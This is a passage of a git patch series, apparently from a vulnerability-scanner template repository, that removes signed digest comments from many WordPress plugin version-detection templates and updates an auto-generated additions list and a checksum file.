a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200d94c6836ad68f103427581088b277586c93a9a7f507260e40b3e502723ce482022019d48380ea61b6cf79d1ad99536ac01217d8c38e1cd7e33e22c0447fb887deb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index bebbc7d0f8..946272f0a9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cf94e8d18d741329b839ff1cf43ca2d918c1d3a3bda9ca1ed5d2a786abdfbba802207ca9b57babdf179220ffb44be68433d6fa7ee067df277626e500e7534b72d798:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index f036bf347e..aa29706872 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210080f141caa1cb1666604738da5fa308b20c2897a6e4aea15c477f8c5db03572fe02205aab1922e090b7e4dedcb5dddc77a26e3d9453aec88fdd533748f70c98f48b60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 3f153cca41..290d53ab7e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100acb7b97043977a4f344a352517f60c0ec7dbdec138fa0cc2c09b357665df23c90221009065262a21cd906de21310ae7c0cb102b5cc615af095b040c5c0dff131316b4f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 6c17779427..e83e8d79e7 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204b42b855fefb33fbe3d3b37b879c1e01e8d4ea79fee385fa0f7c8046476aa466022100f94c49fd9722e943b2a8dc9919fd51d5f129f39b4593dc314f32612d0e81c92a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 091e082566..f1c16275a2 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d556d23a112bd47b9ee6c8ebe6249e34c7eb5f0a4bf3c835687580fba3a4a814022100ca18889d2e72c066255ee1fe3076e763ec15d0e494a81e99c5b504db047f6a83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index a139c228ea..fc072e19d8 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a75955999371a81c29604b921f73178c1c9634bdfdfae0fd491d5d347475f55a0221009608ee1a38c9188b7858797ea15766e2ba302f0f5736935a312fca4a46b006cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index 17a7d66d7d..da9df0e8a5 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202bd15b219dd0e072e6da01c8c5c2ef0f2a572e9c6bfcb57bbff30603c562f118022100b0bf04d1b52c595be1389b981bdf76c3a462dd170bfdef906657efd2d3b3928f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index b860a8309a..f8113d9750 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100efc4151f1abf84481e2455ebb3a7989df17add2073b012c75fb6abdb16b5da76022100e1e3c5f3caa8b8b6c4aab9c49af0a5c49bb4a1b23e9cd792d160dac0d54425f6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 7d1f680232..5f80282ab2 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022023b309782eefcaaad86282b77fcac56f168476bdc76c4ae323c34a8a88ebf75c0220411ee9e8d8178ac85d2695e5a599692ff63fefd47d5d65fb8fa06b613747b461:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 6287624f4a..5725d5bb3f 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100cee949298e11291f65738401f379a8906c3c922e66ccba7720a2b5a3634f44a3022100d0cc1f8193ccdb8769b6498a381912544e0825ddc8ebea8ffab6af09565e0476:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 15d5a5e57f..f67a8bc18a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022060334a978770fc99a9cd8c3e1523e2139519dc990cfac3979960fd7ae2db028c022100f3b3b060b0c19d4198f8a8726ade62d8f2ebaf89ace99d1f2543dbb563d4c2d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index f2f56e8e4e..b9bd4be0a8 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200ed831f3445c66d0dccd891e5b0565a0219b86fc8733c5b95c896c68434dbbaa022100b7efb681efdd5eb3aafdabc01e2b7d486d5ca840465bf2959b607c67531a8029:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index 9821e0231d..bece4ce486 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022051902d81896544aeb7f26b7044717f260ece077679b1b4239ad98209672f586202207540286f05bda52aa2569de73a95c3551c05a26207ce217b333fe457f0833427:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ce274e341b..138b0aa9a6 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022019860b9f884214a467d7cbb5c5e26bcab85eb15213063c086ab69bf5443e72370221009407d46e819f9c666ceefbf1c6afaecfee8cfd3596e4a2b13b1fc0452ddf410c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index ed17238f53..68bf71bc83 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220110b58395c8c3c9b80e23afcfc908336d2ca3871cc677282b093f23ef19ecfd402207ac71e8270c73609d749ac7069801861687b135226196e35aaf7040115ecf063:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index a29f2346f1..10dad2d2fb 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100b9407708e67ccc29f82ac68af90b52b4697abb577afca3278adccfc4163e19c302206d26ccbf19e7dd6eeb2d6f9da5d85feaba0aaeeb63119f05ab3d29b6e92e4b65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index 9eb5fb0ba8..e9efe6fb53 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100974542112d4dbdf957d1a88099b236904408f0837eb66b0f82d62e479645469902202a3c39394dff3428904343e3dd083382f3a7fcf8fcadeed73efe234270dbe2b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index 3c7d3c9554..c3d10f0135 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022022f1fa7397c4f5813459d020e9ca141d5fbe4e748a44cce5f24036e67ce0fb75022079a524f8c2fd0d5d4b28fe162915eea3003e8da53de27f06962c4d12b0e0f48a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index a1b8f108b3..4a8bc6b75c 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100f85069b6e0c1991e97205099219688d49c326820c70bb19bc6065e70c55ae7b802210090a2de523cb36514eaff710e4894ef7825d24d52f457a7f5eb2ead78c04259a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index fb95b71d60..d2c74355bd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220554fcdf6c982d244c9bed2257bfa6459d0b5c2c9856c1bda8ff717580ae7b63b022100a991a498dfbcd08bceb930859b2100a2e004c5b43559d3ce8689b09fc1117b14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index e19607cfbf..94b8494b08 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022069f40b46825b0ff1206ebfcfdb63040b87d15ad0c50865e3f297193b7c067e98022100a6ea115bfad4a9e3980a92d3d22313cfc38c7e8fc01627a088156d5c2366a123:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index d02471105a..108aba79e9 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205b835aec44680daa04857550b43db0c971d59cbc7272fc765712a1ae46fd7ea902200d23cc9260da37df88d3521c6e6350c2a0e1377d640c7cc9aaf70af11839cc80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 36e3a1fef5..f6f6bf5566 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100cc349c4ffb9c250778927ca1b47f93b9f6fa4d8a06f3ba219f91e59d46bef98302203e41300cdd6d69f417c7d0cbf7a22cd06158f5a7ae392c95a56b7892bc5edc71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 59e4325a31..483cb7cac7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204c167cf8113dd3c33c5d470041c404f34417a0c964ae696ded3c022745ca48b2022100cfe36cb9b3c27183e31cac75c48dbdafce57791003dd5fef3d8b20306fc924fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index 5b83920f25..a132c98df4 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d0e6f41f7147a896836d33278b181e27c8beacb6f994994ab170df9223733bd7022100fb39c3026680e015509893b6234bfcc98e4f3845024843ae6605b8c2f8b63153:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 4941e79ee0..135bbee046 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201b295aaf6dae66d1f3dad9f28bd3f5c974138333e61444a7f557eda5a2a8085602204e52a4f1a0b0bbce53a1edaf9453745cceb4660fd50e3e0bf7cc00a25e5f8a31:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 933b881c7b..5b690d96c0 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402207d82a8ce6ad41c3e3066536d29f607510826428782d4cac7de0c71064ae904db0220643dab8289a15d0d35971d19f105bb976421c1fd2541604b15f6cf02bc8577ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 1b77846b7e..16c7d6cff5 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402201a83d4355d9b0fb7f7eb1933663963bc752667d492574a2bed2367463116e33d022019e203f271a9b8d8960c5dd5444fd1d1037fa9addfc442728deba25c1096e451:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index b2441e6f9c..ab099f357e 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220695062aa212fc753a4f1b04e320abf720cb1b93557b918c6b4e200a73d66c6d902207fe9a60355c3d56137098bf26d7fbc33e58ab397561a40e27cd5c47327d94d34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index f8636f78f1..ad0b8f8fed 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502204302ec9c23acdb262e3568d116d3a235b956a636615767cdd97d149d1322fd8f022100aa12589c0872be07ecd85f48c66c35996f7bd6420901e0baf93548bbd4c233db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index a5ebec0988..58e5e828bf 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022034d8fbadad87a4205471b116f47f73e08a6eae7e9b624ca3805a20779af3c35f0220471528a4f84d5eed5ab9f2f32c96659849240d431e4e5f83b49fc85aa2d59d79:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index 9b59168432..f943c7afeb 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203951c4483bd3eafc7e9ecb0a25db1f8e274fb868d60fddd346667b9b405d612602201525c55c47b6f099eb1dc0e2cbaf47e3b112f1bd339fa8b67819ca01d4bbc275:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 75507a2b2d..062e5c85b4 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220199caf4bbcc2c258f8cdcf5315151d8e8b6a9af9283913890439afb906fedd4d022100db95422d835c5725d3a97ba152f3bb69add1d9de54113f63875b57c43c7b0472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 52889669ee..6dcfdda117 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100de5d7e1a14b35a8ea4e69af06fdbbdc6f07cf27417618341108434d5c393d31502207b4fc0a6676320d989c30037857e95e9a7655411e2f9eb3be348edc304d24cf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 7c3675a0ddb76de55b9843deeaf5387eb0a19fbc Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 2 Jul 2024 04:12:38 +0000 Subject: [PATCH 0791/1841] Auto Generated New Template Addition List [Tue Jul 2 04:12:37 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 14919b7faa..ad3198f992 100644 --- a/.new-additions +++ b/.new-additions @@ -12,6 +12,7 @@ http/default-logins/dialogic/dialogic-xms-default-login.yaml http/default-logins/jeedom/jeedom-default-login.yaml http/exposed-panels/apache/apache-apollo-panel.yaml http/exposed-panels/dialogic-xms-console.yaml +http/exposed-panels/endpoint-protector-panel.yaml http/exposures/configs/filestash-admin-config.yaml http/exposures/configs/neo4j-neodash-config.yaml http/misconfiguration/forgejo-repo-exposure.yaml From 382efb04778ecab7d7c292fe7e9cb7dae9ee2d0f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 2 Jul 2024 04:12:44 +0000 Subject: [PATCH 0792/1841] Auto Generated Templates Checksum [Tue Jul 2 04:12:44 UTC 2024] :robot: --- templates-checksum.txt | 427 +++++++++++++++++++++-------------------- 1 file changed, 214 insertions(+), 213 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 74d852fa99..b6a48e3521 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -751,7 +751,7 @@ helpers/wordpress/plugins/black-studio-tinymce-widget.txt:b74c052eec677c340bd7f9 helpers/wordpress/plugins/breadcrumb-navxt.txt:2993934f31a10ddda5a7fb5e979600aa8bc7d69d helpers/wordpress/plugins/breeze.txt:12c708130d75c9e7150d0af82c0b82b66c6c85e0 helpers/wordpress/plugins/broken-link-checker.txt:47ac56ccfa5b6db61c32cb48c2dda8cc64d242cb -helpers/wordpress/plugins/chaty.txt:22603432911b0496f708ee79d4b1177c5263be32 +helpers/wordpress/plugins/chaty.txt:06752d2fb7fe65f618f40a9a33ebe4cc8e204317 helpers/wordpress/plugins/child-theme-configurator.txt:fbd969c78e9a6d04b7b8fc3a74ee2ee96b5fb3d8 helpers/wordpress/plugins/classic-editor.txt:933c3d96b7fbc319e2e08dda5c340797d7c8d99f helpers/wordpress/plugins/classic-widgets.txt:98250286db92ccc336dc6f622c10c8bc09286693 @@ -762,7 +762,7 @@ helpers/wordpress/plugins/coblocks.txt:0f766def7495524760bb6627fe20754b1b42201b helpers/wordpress/plugins/code-snippets.txt:bcfacf8cd6cd2afbf752b95fba64c2c67f0c2e7b helpers/wordpress/plugins/coming-soon.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/complianz-gdpr.txt:47c3ed69e5609d2452fff4d1fa775f2f0aaa7d4c -helpers/wordpress/plugins/contact-form-7-honeypot.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf +helpers/wordpress/plugins/contact-form-7-honeypot.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/contact-form-7.txt:2cb2c87ac5ebde3b1ed1d5d55a5747b6f05ee8f7 helpers/wordpress/plugins/contact-form-cfdb7.txt:87d8ffba80ba87401ae94d97363f39c9ca8aa639 helpers/wordpress/plugins/cookie-law-info.txt:bfab3aeb3ee470933c959fbaefb61840492ea8f8 @@ -798,12 +798,12 @@ helpers/wordpress/plugins/font-awesome.txt:24081282f3a9a62c341308c388d8ed1370576 helpers/wordpress/plugins/force-regenerate-thumbnails.txt:8bff12eeb621c3f4c18ae1d2809b3860778910f4 helpers/wordpress/plugins/formidable.txt:309bd303ec4d8c564bacf4b39075aa7866dcdea4 helpers/wordpress/plugins/forminator.txt:4069b806e5d27e95685e8ab99e1322abd02eb9d4 -helpers/wordpress/plugins/ga-google-analytics.txt:685772c638221af0e5cd971e0621df348dbadc35 +helpers/wordpress/plugins/ga-google-analytics.txt:a0dab5f80a9088edfc02fe1a85d2d833a5c55075 helpers/wordpress/plugins/gdpr-cookie-compliance.txt:2f4af87dfd67a2385a4e30cfbd4d57d669853135 helpers/wordpress/plugins/google-analytics-dashboard-for-wp.txt:bc9981e1c7ebf53d15d8cf9698c2bb6137881fc9 helpers/wordpress/plugins/google-analytics-for-wordpress.txt:ba46cbfd15f3e265cd93b9b01e7e97a6fbfa3a14 helpers/wordpress/plugins/google-listings-and-ads.txt:f0500ea689c78156fdded5bae29d903f2d632a9b -helpers/wordpress/plugins/google-site-kit.txt:b112d64c12ea14bbfa5671fe7ac7af8d575b1e0b +helpers/wordpress/plugins/google-site-kit.txt:451786e82a4757f98ef5d85c39adb09689db4c3f helpers/wordpress/plugins/google-sitemap-generator.txt:8219d4ef07eba68c05cb812b66a743661925aa25 helpers/wordpress/plugins/gtranslate.txt:16b08d6d2a65aa308add14852e0faea08001ef60 helpers/wordpress/plugins/gutenberg.txt:46b9aa433f3d21deebfa357ca15abf4190ceea0e @@ -825,7 +825,7 @@ helpers/wordpress/plugins/intuitive-custom-post-order.txt:d1fd48333115227b181b4b helpers/wordpress/plugins/iwp-client.txt:6c3371737e84ab4219f83867466569f042741c0c helpers/wordpress/plugins/jetpack-boost.txt:6296d4732b242d110df8dee2fc52e75587f5910b helpers/wordpress/plugins/jetpack.txt:a861c6358fded34510ab1962eb66230220d77942 -helpers/wordpress/plugins/kadence-blocks.txt:fd6046ed3fca2ac2e25ef3324e07a62519e6531b +helpers/wordpress/plugins/kadence-blocks.txt:ff9c051b520ac807402f74294d9ef63ab68c6b88 helpers/wordpress/plugins/kirki.txt:9640fdbbae3c8e8f74e96e656f485284e8f8ed9d helpers/wordpress/plugins/leadin.txt:d4a4068d21627778d982b009ccde0601fc6647b8 helpers/wordpress/plugins/limit-login-attempts-reloaded.txt:3996adb4a5baf85b23093a06a6e8607146c2380c @@ -848,11 +848,11 @@ helpers/wordpress/plugins/ml-slider.txt:80ed6599146b54137db225fcbb582290d8512149 helpers/wordpress/plugins/newsletter.txt:806b01f722148eb1b6ddf37464ad8f18232e6422 helpers/wordpress/plugins/nextend-facebook-connect.txt:f6eab21f4096ab86124a60f5d8ae48626e598de9 helpers/wordpress/plugins/nextgen-gallery.txt:8c695bf155c8053505aaa583b04fbde1a8491860 -helpers/wordpress/plugins/ninja-forms.txt:a16cd18f1019f04b207109b189b504edbde41ab2 +helpers/wordpress/plugins/ninja-forms.txt:ce69bc556a6db2eb8d56b75a008630d482b077ce helpers/wordpress/plugins/ocean-extra.txt:18e9f01467bf3568b107a667570d1dd8c6440565 helpers/wordpress/plugins/official-facebook-pixel.txt:49f9230a0175e58b6964e60aa97809134e03c8ae helpers/wordpress/plugins/one-click-demo-import.txt:998d4ef3e7a6039ddbf0f888a2fd1c5243f7318b -helpers/wordpress/plugins/optinmonster.txt:7d8b5404caa565138684fd608724173bbe20f2c6 +helpers/wordpress/plugins/optinmonster.txt:ec386c8e47325b0d9e9d9c49e9bb46a21fcafbf1 helpers/wordpress/plugins/otter-blocks.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/password-protected.txt:b74c052eec677c340bd7f99d94e1557d1f1d5e53 helpers/wordpress/plugins/pdf-embedder.txt:7c48bf349bc02741cd6e5bf188ef8ecd52f2a60c @@ -863,7 +863,7 @@ helpers/wordpress/plugins/pixelyoursite.txt:0b613b1113c478fd8e9cb11573a0ce72f209 helpers/wordpress/plugins/polylang.txt:634ac7a7e33e6dc123884fef23157c442970fb87 helpers/wordpress/plugins/popup-builder.txt:8b367cc24dc19d310f9af1157021067beef77465 